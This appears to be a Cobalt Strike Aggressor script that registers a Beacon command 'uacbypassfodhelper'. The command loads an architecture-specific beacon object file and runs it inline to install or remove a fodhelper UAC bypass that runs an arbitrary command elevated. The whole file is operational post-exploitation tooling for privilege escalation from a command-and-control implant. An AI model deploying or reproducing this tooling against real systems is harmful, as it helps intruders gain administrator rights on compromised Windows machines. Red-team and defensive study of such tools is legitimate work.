#Register command
beacon_command_register(
    "uacbypassfodhelper",
    "UAC Bypass - Fodhelper. Two commands, one to install the bypass, one to uninstall. It's the users responsibility to start fodhelper after installation",
    "uacbypassfodhelper install [command]\nuacbypassfodhelper uninstall"
);

alias uacbypassfodhelper {
    local('$barch $handle $data $args');
    println(@_);
    
    # figure out the arch of this session
    $barch  = barch($1);
    $handle = openf(script_resource("uacbypassfodhelper. $+ $barch $+ .o"));
    $data = readb($handle, -1);
    closef($handle);   
    
    if(size(@_) == 3)
    {
	btask($1, "Executing uacbypassfodhelper install by jordanjoewatson");
    	$args = bof_pack($1, "z", $3);
	beacon_inline_execute($1, $data, "install", $args);
    } else if (size(@_) == 2) {
	btask($1, "Executing uacbypassfodhelper uninstall by jordanjoewatson")
	$args = bof_pack($1);
	beacon_inline_execute($1, $data, "uninstall", $args);
    }

    return ;
}
